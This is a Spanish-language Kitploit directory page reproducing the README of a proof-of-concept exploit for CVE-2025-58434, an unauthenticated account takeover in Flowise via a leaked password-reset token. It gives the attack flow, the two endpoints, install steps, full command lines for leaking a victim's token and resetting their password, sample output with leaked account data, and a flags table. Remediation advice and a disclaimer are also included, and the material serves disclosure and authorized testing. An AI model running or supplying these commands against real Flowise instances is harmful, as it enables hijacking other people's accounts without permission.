Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-58434-poc — Exploit de prueba de concepto para CVE-2025-58434, que demuestra la toma de control de cuentas sin autenticación en Flowise mediante tokens de restablecimiento de contraseña filtrados. Incluye un ataque de dos etapas: fuga de tokens y restablecimiento de contraseña. | Kitploit
Herramientas/GitHubGitHub/kartik2005221/cve-2025-58434-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAutenticaciónAprendizaje y EducaciónRed Teaming
GitHubkartik2005221/cve-2025-58434-poc

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-58434-poc

Exploit de prueba de concepto para CVE-2025-58434, que demuestra la toma de control de cuentas sin autenticación en Flowise mediante tokens de restablecimiento de contraseña filtrados. Incluye un ataque de dos etapas: fuga de tokens y restablecimiento de contraseña.

Ver Repositorio
1hace 4 mesesAún no revisado

CVE-2025-58434 — Toma de Control de Cuenta en Flowise mediante Divulgación de Token

CVE CVSS Python License Disclosure

⚠️ Este repositorio es solo para fines educativos e investigación de seguridad autorizada.
El uso no autorizado contra sistemas que no posee o para los cuales no tiene permiso explícito es ilegal.


Tabla de Contenidos

  • Descripción General
  • Detalles de la Vulnerabilidad
  • Flujo del Ataque
  • Versiones Afectadas
  • Estructura del Repositorio
  • Requisitos
  • Instalación
  • Uso
  • Ejemplo de Salida
  • Remediación
  • Cronología de Divulgación
  • Referencias
  • Aviso Legal

Descripción General

El endpoint forgot-password en Flowise (tanto en la versión en la nube como en la autoalojada) devuelve un token de restablecimiento de contraseña válido (tempToken) directamente en el cuerpo de la respuesta HTTP sin ninguna verificación por correo electrónico ni autenticación.

Esto significa que un atacante que conoce (o puede adivinar) la dirección de correo electrónico de una víctima puede:

  1. Llamar al endpoint forgot-password → recibir el tempToken en la respuesta JSON
  2. Usar el tempToken para llamar a reset-password → establecer una nueva contraseña arbitraria
  3. Iniciar sesión como la víctima → toma de control total de la cuenta (ATO)

No se requiere acceso previo, interacción del usuario ni acceso al correo electrónico.


Detalles de la Vulnerabilidad

Causa Raíz

El manejador de forgot-password devuelve el registro completo del usuario, incluido el tempToken generado, directamente en la respuesta de la API en lugar de solo enviarlo a la dirección de correo electrónico registrada del usuario.

root@kitploit:~
{
  "user": {
    "id": "<uuid>",
    "name": "Nombre de la Víctima",
    "email": "[email protected]",
    "credential": "<bcrypt-hash>",
    "tempToken": "<TOKEN_FILTRADO>",
    "tokenExpiry": "2025-08-19T13:00:33.834Z",
    "status": "active"
  }
}

Flujo del Ataque

root@kitploit:~
Atacante                              API de Flowise
   │                                       │
   │  POST /forgot-password {email}        │
   │──────────────────────────────────────►│
   │                                       │  (genera tempToken)
   │◄──────────────────────────────────────│
   │  201 { tempToken: "abc123..." }       │
   │                                       │
   │  POST /reset-password {email,         │
   │         tempToken, newPassword}       │
   │──────────────────────────────────────►│
   │                                       │
   │◄──────────────────────────────────────│
   │  200 OK  (contraseña cambiada!)       │
   │                                       │
   ✓  Toma de Control de Cuenta Completada

Versiones Afectadas

  • Flowise Cloud (cloud.flowiseai.com) — confirmado afectado
  • Todas las implementaciones autoalojadas de Flowise anteriores al parche

Consulte el repositorio oficial de Flowise en GitHub para obtener información sobre la versión parcheada.


Estructura del Repositorio

root@kitploit:~
CVE-2025-58434/
├── cve_2025_58434_poc.py   # Script PoC principal (ATO en dos etapas)
├── requirements.txt         # Dependencias de Python
├── README.md                # Este archivo
└── DISCLAIMER.md            # Aviso legal (léalo antes de usar)

Requisitos

  • Python 3.7 o superior
  • Biblioteca requests

Instalación

root@kitploit:~
# Clonar el repositorio
git clone https://github.com/yourhandle/CVE-2025-58434
cd CVE-2025-58434

# Instalar dependencias
pip install -r requirements.txt

Uso

Pantalla de Ayuda

root@kitploit:~
python3 cve_2025_58434_poc.py --help

Etapa 1 — Obtener el Token (Reconocimiento)

Confirme que la instancia es vulnerable y recupere el tempToken sin restablecer ninguna contraseña.

root@kitploit:~
python3 cve_2025_58434_poc.py \
  --url https://flowise.example.com \
  --email [email protected]

Etapa 2 — Toma de Control Total de la Cuenta

Use el token filtrado para restablecer la contraseña inmediatamente.

root@kitploit:~
python3 cve_2025_58434_poc.py \
  --url https://flowise.example.com \
  --email [email protected] \
  --reset \
  --new-password "MyNewP@ss2025!"

Volcar la Respuesta JSON Cruda

root@kitploit:~
python3 cve_2025_58434_poc.py \
  --url https://flowise.example.com \
  --email [email protected] \
  --json-output

Todas las Opciones


Ejemplo de Salida

root@kitploit:~
  [Paso 1] Enviando solicitud de forgot-password …
  [*] Estado HTTP : 201

  ========================================================================
    DATOS FILTRADOS DE LA CUENTA
  ========================================================================
    ID de Usuario : 3fa1c2d4-xxxx-xxxx-xxxx-xxxxxxxxxxxx
    Nombre        : Usuario Admin
    Correo        : [email protected]
    Credencial    : $2b$10$xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    Estado        : active
    tempToken     : eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
    tokenExpiry   : 2025-08-19T13:00:33.834Z
  ========================================================================

  [+] tempToken obtenido  : eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
  [!] VULNERABLE: ¡La instancia filtra tokens de restablecimiento de contraseña sin autenticación!

Remediación

Si es operador de una instancia de Flowise, aplique las siguientes mitigaciones de inmediato:

  1. Nunca devuelva tokens de restablecimiento en respuestas de la API. Envíe el token exclusivamente mediante la dirección de correo electrónico registrada.
  2. Devuelva un mensaje de éxito genérico desde forgot-password independientemente de si el correo existe — esto también evita la enumeración de cuentas.
  3. Imponga restricciones al token:
    • De un solo uso (invalidar después del primer uso)
    • Caducidad corta (p. ej., 15 minutos)
    • Vinculado a la IP / User-Agent solicitante cuando sea posible
  4. Aplique la corrección a todos los modelos de implementación — nube y autoalojados.
  5. Agregue limitación de tasa al endpoint forgot-password.
  6. Registre y alerte sobre actividad anormal de restablecimiento de contraseña.
  7. Considere MFA para cuentas de administrador y de altos privilegios.

Cronología de Divulgación

FechaEvento
2025-08-19Vulnerabilidad descubierta y reportada
Por definirReconocimiento del proveedor
Por definirParche publicado
Por definirDivulgación pública

Referencias

  • Aviso de GitHub GHSA-wgpv-6j63-x5ph
  • NVD — CVE-2025-58434
  • Repositorio de Flowise en GitHub
  • CWE-640: Mecanismo Débil de Recuperación de Contraseña

Aviso Legal

Este proyecto está destinado únicamente a fines educativos y pruebas de penetración autorizadas.

  • NO ejecute esta herramienta contra ningún sistema sin permiso explícito por escrito del propietario del sistema.
  • El(los) autor(es) de este repositorio no aceptan ninguna responsabilidad por cualquier uso indebido, daño o consecuencia legal derivada del uso no autorizado.
  • Consulte DISCLAIMER.md para el aviso legal completo.
Descargar herramienta
CampoValor
CVE IDCVE-2025-58434
Puntuación CVSS9.8 (Crítico)
Vector CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWECWE-640: Mecanismo Débil de Recuperación de Contraseña
TipoBypass de Autenticación / Exposición Insegura de Objetos Directos
App AfectadaFlowise (nube + autoalojada)
Endpoint 1POST /api/v1/account/forgot-password
Endpoint 2POST /api/v1/account/reset-password
FlagCortoDescripciónValor por Defecto
--url URL-uURL base de la instancia de Flowise(requerido)
--email EMAIL-eDirección de correo electrónico de la cuenta objetivo(requerido)
--reset-rRealizar Etapa 2: restablecer contraseña con token filtradoFalse
--new-password PASS-pNueva contraseña a establecer (usado con --reset)Changeme@2025!
--timeout SECONDS-tTiempo de espera para solicitudes HTTP10
--json-output-jImprimir respuesta JSON cruda de la API en salida estándarFalse